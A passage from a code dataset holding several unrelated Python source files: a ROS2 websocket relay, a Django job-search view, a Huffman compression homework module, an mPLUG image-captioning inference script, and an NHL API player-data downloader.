self._send_to_all(json.dumps(return_msg_data))\n\n    def _on_steering(self, msg: String):\n        self._loop.create_task(self._on_steering_async(msg))\n\n    async def _on_steering_async(self, msg: String):\n        msg_obj = json.loads(msg.data)\n        return_msg_data = {\n            \"type\": MessageType.STEER.value,\n            \"data\": {\n                \"steer\": msg_obj[\"steer\"],\n                \"throttle\": msg_obj[\"throttle\"]\n            }\n        }\n        await self._send_to_all(json.dumps(return_msg_data))\n    \n    async def _send_to_all(self, data: str):\n        if len(self._clients) > 0:\n            await asyncio.gather(*[c.send(data) for c in self._clients], return_exceptions=False)\n\n    async def _on_new_client(self, socket, path):\n        self.get_logger().info('New client')\n        self._clients.add(socket)\n        try:\n            async for msg in socket:\n                await self._handle_ws_message(socket, msg)\n        except websockets.ConnectionClosedOK:\n            self.get_logger().info(\"Goodbye\")\n            pass\n        finally:\n            self._clients.remove(socket)\n\n    async def _handle_ws_message(self, socket, msg):\n        msg_type, msg_data = parse_websocket_msg(msg)\n        if msg_type == MessageType.PING:\n            return_msg_data = {\n                \"type\": MessageType.PONG.value,\n                \"data\": None\n            }\n            await socket.send(json.dumps(return_msg_data))\n        elif msg_type == MessageType.DMS:\n            self.get_logger().info(\"DMS\")\n            self._dms_pub.publish(Empty())\n        elif msg_type == MessageType.OFFLOADED_INFERENCE:\n            self.get_logger().info(\"Offloaded inference\")\n            mask = b64_to_opencv(msg_data)\n            mask_msg = self._bridge.cv2_to_imgmsg(np.array(mask))\n            self._mask_pub.publish(mask_msg)\n            await self._on_mask_async_parsed(mask)\n        else:\n            raise Exception(f\"Unknown message type: {msg_type}\")\n\n\nasync def main_async(args=None):\n    rclpy.init(args=args)\n    ws_server = GcsWebuiWsServer()\n    await ws_server.init()\n    await ws_server.serve_forever()\n    ws_server.destroy_node()\n    rclpy.shutdown()\n\n\ndef main(args=None):\n    asyncio.get_event_loop().run_until_complete(main_async(args))\n\n\nif __name__ == \"__main__\":\n    main(sys.argv)\n", "repo_name": "ubipo/pathy", "sub_path": "ros/pathy/pathy/gcs_webui_ws_server.py", "file_name": "gcs_webui_ws_server.py", "file_ext": "py", "file_size_in_byte": 6017, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.dtype", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.IMREAD_ANYCOLOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.dtype", "line_number": 35, "usage_type": "attribute"}, {"api_name": "enum.Enum", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 57, "usage_type": "call"}, {"api_name": "asyncio.AbstractEventLoop", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rclpy.node.Node", "line_number": 68, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 71, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 73, "usage_type": "argument"}, {"api_name": 
"std_msgs.msg.String", "line_number": 77, "usage_type": "argument"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 80, "usage_type": "argument"}, {"api_name": "std_msgs.msg.Empty", "line_number": 81, "usage_type": "argument"}, {"api_name": "cv_bridge.CvBridge", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 84, "usage_type": "call"}, {"api_name": "rclpy.spin_once", "line_number": 93, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "websockets.serve", "line_number": 97, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.dtype", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 115, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 117, "usage_type": "name"}, {"api_name": "std_msgs.msg.String", "line_number": 120, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 133, "usage_type": "call"}, {"api_name": "websockets.ConnectionClosedOK", "line_number": 141, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "std_msgs.msg.Empty", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "rclpy.init", "line_number": 169, "usage_type": "call"}, {"api_name": "rclpy.shutdown", "line_number": 174, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 178, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 182, "usage_type": "attribute"}]}
+{"seq_id": "27921765542", "text": "from django.shortcuts import render\nfrom job_search.models import Job\nfrom .forms import SearchBarForm\n\nfrom django.db.models import Q\n\nfrom functools import reduce\nimport operator\n\n# Create your views here.\n\ndef job_search_index(request):\n jobs = Job.objects.all()\n\n query = \"\"\n results = None\n\n form = SearchBarForm()\n if request.method == 'POST':\n form = SearchBarForm(request.POST)\n if form.is_valid():\n query = form.cleaned_data[\"query\"]\n if ',' in query:\n query = query.split(',')\n else:\n query = query.split(' ')\n\n print(query)\n\n descResults = Job.objects.filter(reduce(operator.and_, [Q(description__icontains=term) for term in query]))\n cityResults = Job.objects.filter(reduce(operator.and_, [Q(city__icontains=term) for term in query]))\n stateResults = Job.objects.filter(reduce(operator.and_, [Q(state__icontains=term) for term in query]))\n results = descResults | cityResults | stateResults\n else:\n form = SearchBarForm()\n\n context = {\n 'jobs': jobs,\n 'form': form,\n 'query': query if query else \"\",\n 'results': results\n }\n return render(request, 'job_search_index.html', context)\n\ndef job_detail(request, pk):\n job = Job.objects.get(pk=pk)\n context = {\n 'job': job\n }\n return render(request, 'job_detail.html', context)", "repo_name": "Gabriel0110/Entry-Level-X", "sub_path": "job_search/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "job_search.models.Job.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 13, "usage_type": "name"}, {"api_name": "forms.SearchBarForm", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 20, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 30, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 30, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 31, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 31, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 32, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.and_", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.db.models.Q", "line_number": 32, "usage_type": "call"}, {"api_name": "forms.SearchBarForm", "line_number": 
35, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "job_search.models.Job.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "job_search.models.Job", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}]}
+{"seq_id": "40715480860", "text": "################################################################\n# FILE: hzlib.py\n# WRITER: Roi Greenberg + roigreenberg + 305571234\n# EXERCISE : intro2cs ex9 2013-2014\n# Description: implement some function about Huffman tree and\n# compress and decompress data\n################################################################\n\nimport collections\nfrom bisect import bisect\n'''\nThis module contains several function for compress and decompress data, using\nthe Huffman code algorithm.\n'''\n\nMAGIC = b\"i2cshcfv1\"\nLEFT_TREE = 0\nRIGHT_TREE = 1\n\ndef symbol_count(data):\n \"\"\"the function return dictionary from item to number of returns in data\n Args: data - a data\n \"\"\"\n return collections.Counter(data)\n\n\ndef make_huffman_tree(counter):\n \"\"\"the function create a huffman tree of a given dictionary from item to\n number of returns\n Return tree of tuple of tuples represent the tree or None if dictionary\n is empty\n Args: counter - a dictionary (output of symbol_data)\n \"\"\"\n # create a list from the dictonary and sorted it from low repeats to high\n # and high value to low\n sort_list = sorted([(tuple0, counter[tuple0]) for tuple0 in counter], \\\n reverse=True )\n sort_list.sort(key=lambda leaf: leaf[1])\n\n # run until have only 1 tuple\n while len(sort_list) > 1:\n # take the first 2 tuples\n tuple1 = sort_list.pop(0)\n tuple2 = sort_list.pop(0)\n\n # calculate the combined repeats\n count = tuple1[1] + tuple2[1]\n\n #create new tuple of both tuple\n parent = ((tuple2[0], tuple1[0]), count)\n\n #create a list of all the reapets\n counts = [repeats[1] for repeats in sort_list]\n\n #insert the new tuple to the list in the right place\n sort_list.insert(bisect(counts, count), parent)\n\n return sort_list[0][0] if sort_list else None\n\n\ndef build_codebook(huff_tree):\n \"\"\"create a codebook of the Huffman tree\n the function recieve a huffman tree and return a dictionary from item\n to tuple of length and decimal value of the binary code represent the item\n Args:\n huff_tree - a coded tree of a recursive tuple structure\n (same structure of output of privious function).\n bin_item - a string. default is \"\".\n codebook - a dictionary. 
\"\"\"\n    new_codebook = {}\n    def codebook(huff_tree, n=\"\"):\n        # return an empty dictionary if the tree is empty\n        if not huff_tree:\n            return {}\n        # return the dictionary in case the tree is only 1 leaf\n        elif type(huff_tree) is not tuple:\n            return {huff_tree: (1, 0)}\n\n        # the left branch\n        left=huff_tree[LEFT_TREE]\n        # the right branch\n        right=huff_tree[RIGHT_TREE]\n\n        # if we reached a leaf, add it to the dictionary;\n        # otherwise check the left branch recursively\n        if type(left) is not tuple:\n            binary_info = (len(n + \"0\"), int(n + \"0\", 2))\n            new_codebook[left] = binary_info\n        else:\n            codebook(left, n + \"0\")\n        \n        # if we reached a leaf, add it to the dictionary;\n        # otherwise check the right branch recursively\n        if type(right) is not tuple:\n            binary_info = (len(n + \"1\"), int(n + \"1\", 2))\n            new_codebook[right] = binary_info \n        else:\n            codebook(right, n + \"1\")\n        \n        return new_codebook\n    return codebook(huff_tree)\n\n    \n\ndef build_canonical_codebook(codebook):\n    \"\"\"create a canonical codebook of the Huffman tree\n    the function receives a huffman codebook and returns a dictionary from item\n    to a tuple of the length and decimal value of the binary code representing\n    the item in canonical form\n    Args:\n        codebook - a dictionary - table of char: code pairs.\"\"\"\n    # create a list from the codebook, sorted by item value and then\n    # stably by code length, shortest first\n    new_list = sorted([[leaf,codebook[leaf][0]] for leaf in codebook])\n    new_list.sort(key=lambda x: x[1])\n    \n    # return an empty codebook if the input is empty\n    if not new_list:\n        return {}\n    # take the length of the first item\n    length=new_list[0][1]\n    # build the binary code for the first item\n    code = \"0\" + ''.join(\"0\" for i in range(length - 1))\n    # create a new dictionary with the first item and its new code\n    canonical_codebook={new_list[0][0]: (length,int(code,2))}\n    # run over every item from the second one on\n    for item in new_list[1:]:\n        # increment the previous code to get this item's code\n        code = bin(int(code,2)+1)[2:]\n        # left-pad the code with 0s if it is shorter than\n        # the previous item's code length\n        if len(code) < length:\n            code=code.zfill(length)\n        # take the current length\n        length=item[1]\n        # append 0s to the end of the code if it is shorter than\n        # this item's code length\n        code=code+\"\".join(\"0\" for i in range(length-len(code)))\n        # add the item with its new code to the dictionary\n        canonical_codebook[item[0]] = (length, int(code, 2))\n    \n    return canonical_codebook\n\n    \ndef build_decodebook(codebook):\n    ''' returns a dictionary from a tuple of the length and decimal value of\n    the binary code to the item, built from a dictionary of item to tuple of\n    length and decimal value of the binary code\n    Args:\n        codebook - a dictionary - table of char: code pairs.\n    '''\n    # new dictionary\n    decodebook = {}\n    # fill the new dictionary with the value as key and the key as value\n    for item in codebook:\n        decodebook[codebook[item]]=item\n    return decodebook\n\ndef compress(corpus, codebook):\n    \"\"\"the function creates an iterator of 0 or 1 as ints, by iterating over\n    the corpus input.\n\n    Args:\n        corpus - a sequence of chars given by an iterator.\n        codebook - a dictionary - table of char: code pairs.\n    
\"\"\"\n\n # run for every item in corpus\n for item in corpus:\n # take the length and decimal values according to the codebook\n length = codebook[item][0]\n num = codebook[item][1]\n # convert to binary\n binary = bin(num)[2:].zfill(length)\n # iterator?????\n for char in binary:\n yield int(char)\n\ndef decompress(bits, decodebook):\n \"\"\"the function run over the decoding bits of coded bits input\n and create an iterator of 0 or 1 as an int.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\n decodebook - a dictionary, a decoded one\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n # add the current binary code the next bit\n binary = binary + str(bit)\n # create a tuple of length and decimal value of the binary code\n decode = (len(binary), int(binary, 2))\n # if the binary code is in the decodebook return his value and reset\n # the binary code\n if decode in decodebook:\n yield decodebook[decode]\n binary = \"\"\n\n\ndef pad(bits):\n \"\"\"the function run over each eight sequence bits out of the input,\n adds the 1 as a final bit and appends zeros for the total length be\n divided by 8. the function create an iterator of 0 or 1 as an ints.\n\n Args:\n bits - an iterable, a sequence of coded bits each is an int 0 or 1.\"\"\"\n # set a new binary code\n binary = \"\"\n # run for every bit\n for bit in bits:\n binary = binary + str(bit)\n # when binary code have length of 8 return the decimal value and reset\n # the binary code\n if len(binary) == 8:\n yield int(binary, 2)\n binary = \"\"\n # for the last bits, add single 1 and zeros until binary have length of 8\n binary = binary + \"1\"\n while len(binary) != 8:\n binary = binary + \"0\"\n # return the last binary code\n yield int(binary, 2)\n\ndef unpad(byteseq):\n \"\"\"the function run over all bytes of input, taking off the '0' and '1'\n on top of it and create an iterator of 0 or 1 as ints.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n # set a boolin for the first byte\n first = True\n # run for every byte\n for byte in byteseq:\n # for the first byte get his binary value and finish the corrent loop\n if first:\n binary = bin(byte)[2:].zfill(8)\n first = False\n continue\n \n # return every single bit as iterator\n for bit in binary:\n yield int(bit)\n # get the next byte binary value\n binary = bin(byte)[2:].zfill(8)\n # for the last byte, find the last \"1\" digit index\n index = -1\n bit = binary[index]\n while bit != \"1\":\n index -= 1\n bit = binary[index]\n # return the bits up to the last \"1\" digit\n for bit in binary[:index]:\n yield int(bit)\n\ndef join(data, codebook):\n \"\"\"the function run over the bytes of input (first codebook then data)\n and create an iterator of the codebook vals which appear, then the\n data items.\n\n Args:\n data - an iterator, a sequence of bytes.\n codebook - a canonical code table, the output of\n build_canonical_codebook.\"\"\"\n for key in range(256):\n if key in codebook:\n yield codebook[key][0]\n else:\n yield 0\n for data_0 in data:\n yield data_0\n\ndef split(byteseq):\n \"\"\"that function split the output of the function join to data and codebook\n the function return a tuple which is consist of a dictionary - canonical\n coding table and an iterator which iterate over rest of byteseq as\n byte sequent.\n\n Args:\n byteseq - an iterator, a sequence of bytes.\"\"\"\n index = 0\n codebook = {}\n data = []\n for byte in byteseq:\n if index < 256:\n if byte != 0:\n codebook[index] = 
(byte, 0)\n index += 1\n else:\n data.append(byte)\n codebook = build_canonical_codebook(codebook)\n return iter(data), codebook\n \n", "repo_name": "roigreenberg/Introduction-to-Computer-Science-2013-2014", "sub_path": "ex9/hzlib.py", "file_name": "hzlib.py", "file_ext": "py", "file_size_in_byte": 9947, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 24, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 56, "usage_type": "call"}]}
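Assuming the module above is importable as hzlib, its pieces chain into a lossless round trip; a sketch on a short byte string (untested against the original course harness):

import hzlib

data = b"abracadabra"
counts = hzlib.symbol_count(data)                  # Counter of byte values
tree = hzlib.make_huffman_tree(counts)
book = hzlib.build_canonical_codebook(hzlib.build_codebook(tree))
decodebook = hzlib.build_decodebook(book)
bits = list(hzlib.compress(data, book))            # flat list of 0/1 ints
assert bytes(hzlib.decompress(iter(bits), decodebook)) == data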
+{"seq_id": "13437188850", "text": "import argparse, yaml, os, utils, torch, glob, cv2, numpy, time\nfrom pathlib import Path\nfrom models.tokenization_bert import BertTokenizer\nfrom models.model_caption_mplug import MPLUG\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom optim import create_optimizer\nfrom models.vit import resize_pos_embed\nfrom PIL import Image\nfrom torchvision import transforms\n\nBLACK_BACKGROUND_HEIGHT = 50\nOUTPUT_WIDTH = 720\nOUTPUT_HEIGHT = 480\n\nclass ImageCaptionModel:\n\n def __init__( self, args, config):\n print(f\"Loading mPLUG model . . .\")\n utils.init_distributed_mode( args )\n self.device = torch.device( args.device )\n cudnn.benchmark = True\n self.tokenizer = BertTokenizer.from_pretrained( config['text_encoder'])\n self.model = MPLUG( config = config, tokenizer=self.tokenizer )\n self.model = self.model.to(self.device)\n self.optimiser = create_optimizer( utils.AttrDict(config['optimizer']), self.model )\n self.checkpoint = torch.load( args.checkpoint, map_location=\"cpu\" )\n \n try:\n self.state_dict = self.checkpoint['model']\n except:\n self.state_dict = self.checkpoint['module']\n \n num_patches = int(config[\"image_res\"] * config[\"image_res\"]/(16*16))\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768).float())\n pos_embed = resize_pos_embed(self.state_dict['visual_encoder.visual.positional_embedding'].unsqueeze(0),\n pos_embed.unsqueeze(0))\n self.state_dict['visual_encoder.visual.positional_embedding'] = pos_embed\n self.model.load_state_dict( self.state_dict, strict=False )\n self.model.eval()\n self.model.to( self.device )\n\n print(f\"Model loaded: {args.checkpoint}\")\n\n def generateDisplayImage( self, generated_caption, cv2_image ):\n display_text = f\"Caption: {generated_caption}\"\n black_background = numpy.zeros([ BLACK_BACKGROUND_HEIGHT, cv2_image.shape[1], 3], dtype=numpy.uint8)\n cv2.putText( black_background, display_text, (int(BLACK_BACKGROUND_HEIGHT/2), int(BLACK_BACKGROUND_HEIGHT/2)), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 250, 0), 1, cv2.LINE_AA )\n stack_image = cv2.vconcat( [black_background, cv2_image] )\n return stack_image\n\n\n def inference( self, transfomred_image, cv2_image ):\n start_time = time.time()\n top_ids, _ = self.model( transfomred_image, \"\", train=False )\n cv2_image = cv2.resize( cv2_image, ( OUTPUT_WIDTH, OUTPUT_HEIGHT ))\n for id in top_ids:\n ans = self.tokenizer.decode(id[0]).replace(\"[SEP]\", \"\").replace(\"[CLS]\", \"\").replace(\"[PAD]\", \"\").strip()\n end_time = time.time()\n fps = 1 / ( end_time - start_time )\n display_image = self.generateDisplayImage( ans, cv2_image )\n cv2.imshow('output', display_image)\n cv2.waitKey(0)\n\n @staticmethod\n def load_image(image, image_size):\n device = \"cuda:0\"\n raw_image = Image.open(str(image)).convert('RGB')\n cv2_image = numpy.array( raw_image )\n cv2_image = cv2_image[:,:,::-1].copy()\n\n w, h = raw_image.size\n\n transform = transforms.Compose([\n transforms.Resize((image_size, image_size) ),\n transforms.ToTensor(),\n transforms.Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711))\n ])\n image = transform(raw_image).unsqueeze(0).to(device)\n return image, cv2_image\n \n\ndef getConfigurations():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='./configs/caption_mplug_base.yaml')\n parser.add_argument('--checkpoint', default='./mplug_base.pth')\n parser.add_argument('--device', default='cuda')\n parser.add_argument('--min_length', default=10, type=int)\n 
parser.add_argument('--max_length', default=25, type=int)\n parser.add_argument('--max_input_length', default=25, type=int)\n\n args = parser.parse_args()\n config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader)\n\n # assign the config variables needed for model initialisation\n config[\"min_length\"] = args.min_length\n config[\"max_length\"] = args.max_length\n config['text_encoder'] = \"bert-base-uncased\"\n config['text_decoder'] = \"bert-base-uncased\"\n config['beam_size'] = 5\n config['optimizer']['lr'] = 2e-5\n\n return args, config\n\ndef main():\n\n args, config = getConfigurations()\n image_caption_model = ImageCaptionModel( args, config )\n image_folder = \"./sample_images/\"\n for image in glob.glob( image_folder + '/*' ):\n transformed_image, cv2_image = image_caption_model.load_image( image, image_size=config['image_res'] )\n image_caption_model.inference( transformed_image, cv2_image )\n\nif __name__ == \"__main__\":\n main()", "repo_name": "globalwalkers-aws/image_captioning", "sub_path": "mPLUG/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 4979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.init_distributed_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 22, "usage_type": "name"}, {"api_name": "models.tokenization_bert.BertTokenizer.from_pretrained", "line_number": 23, "usage_type": "call"}, {"api_name": "models.tokenization_bert.BertTokenizer", "line_number": 23, "usage_type": "name"}, {"api_name": "models.model_caption_mplug.MPLUG", "line_number": 24, "usage_type": "call"}, {"api_name": "optim.create_optimizer", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.AttrDict", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "models.vit.resize_pos_embed", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 48, "usage_type": "attribute"}, {"api_name": "cv2.vconcat", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 68, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 74, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 74, 
"usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 75, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 75, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 84, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 93, "usage_type": "call"}, {"api_name": "yaml.Loader", "line_number": 93, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 110, "usage_type": "call"}]}
+{"seq_id": "8863868696", "text": "import logging\nimport json\n\nimport pandas as pd\nimport urllib\nimport urllib.request\nimport sqlite3\nimport sqlalchemy as sa\n\nfrom tqdm import tqdm\n\nfrom settings import DATABASE_NAME\nfrom misc_functions import import_data_from_sql, get_json_data_from_link, insert_into_db\n\npd.set_option('display.max_columns', None)\n\nlogging.basicConfig(level='INFO')\nlogger = logging.getLogger()\n\n# Settings\nplayer_info_cols = ['player_id', \n 'firstName', 'lastName', 'nationality', 'birthCity',\n 'position',\n 'birthDate',\n 'birthStateProvince',\n 'height',\n 'weight', 'shootsCatches']\n\n\nengine = sa.create_engine(f'sqlite:///{DATABASE_NAME}')\n\nurl_prefix = 'https://statsapi.web.nhl.com'\npeople_prefix = '/api/v1/people/'\n\n\ndef get_player_info(player):\n \n player_info_df = pd.DataFrame([], columns=player_info_cols)\n \n player_id = player['player_id']\n player_url = url_prefix + people_prefix + str(player_id)\n player_details_dict = get_json_data_from_link(player_url)\n\n if player_details_dict is None:\n return None\n\n player_dict = player_details_dict.get('people')\n player_info_df = player_info_df.append(player_dict[0], ignore_index=True)\n \n if len(player_dict) > 1:\n logger.warning('MORE THAN ONE PERSON!')\n\n # Extract useful primary position\n if 'primaryPosition' in player_info_df.columns:\n\n player_position_dict = player_info_df[['primaryPosition']].to_dict(orient='index')\n\n primary_position_dict = [[id, data.get('primaryPosition').get('abbreviation') ]\n for id, data in player_position_dict.items()]\n \n position_df = pd.DataFrame(\n primary_position_dict, columns=['index', 'position'])\n position_df.set_index('index', inplace=True)\n\n player_w_position = pd.merge(player_info_df, \n position_df, \n left_index=True,\n right_index=True,\n suffixes=['_old', ''])\n else:\n player_w_position = player_info_df.copy()\n player_w_position['position'] = None\n \n # Remove remaining dicts from dataframe\n if 'currentTeam' in player_w_position.columns:\n player_w_position.drop(\n ['currentTeam'], \n axis=1,\n inplace=True)\n if 'primaryPosition' in player_w_position.columns:\n player_w_position.drop(\n [ 'primaryPosition'],\n axis=1,\n inplace=True)\n player_w_position.rename(columns={'id': 'player_id'}, inplace=True)\n\n return player_w_position\n\n\ndef get_player_data():\n\n player_games = import_data_from_sql('game_players')\n player_info = import_data_from_sql('player_info')\n\n player_info_not_na = player_info[~player_info['firstName'].isna()]\n\n if player_games.empty :\n logger.info('No games have been processed.')\n return None\n elif player_info_not_na.empty:\n logger.info('No player info has been downloaded. 
Processing all players')\n players_ids = player_games[['player_id']].drop_duplicates()\n else:\n players_unique = player_games[['player_id']].drop_duplicates()\n players_ids = players_unique[~players_unique['player_id'].isin(\n player_info_not_na['player_id'])]\n\n # Get player data \n for _, player in tqdm(players_ids.iterrows(), total=players_ids.shape[0]):\n print(player['player_id'])\n player_info_updated = get_player_info(player)\n\n if player_info_updated is not None:\n player_info_updated_cleaned = player_info_updated[~player_info_updated['firstName'].isna()]\n if not player_info_updated_cleaned.empty:\n insert_into_db(\n player_info_updated_cleaned[player_info_cols], 'player_info')\n\n\n \n", "repo_name": "lmanzer/nhl_analysis", "sub_path": "src/nhl_api/get_player_info.py", "file_name": "get_player_info.py", "file_ext": "py", "file_size_in_byte": 3814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.set_option", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.DATABASE_NAME", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "misc_functions.get_json_data_from_link", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 65, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 92, "usage_type": "call"}, {"api_name": "misc_functions.import_data_from_sql", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 109, "usage_type": "call"}, {"api_name": "misc_functions.insert_into_db", "line_number": 116, "usage_type": "call"}]}
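The incremental-download logic above reduces to one isin mask: fetch only the player ids that have no info row yet. A standalone sketch with hypothetical ids:

import pandas as pd

player_games = pd.DataFrame({"player_id": [1, 2, 3, 4]})
player_info = pd.DataFrame({"player_id": [2, 4]})  # already downloaded
todo = player_games[~player_games["player_id"].isin(player_info["player_id"])]
print(todo["player_id"].tolist())  # [1, 3]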
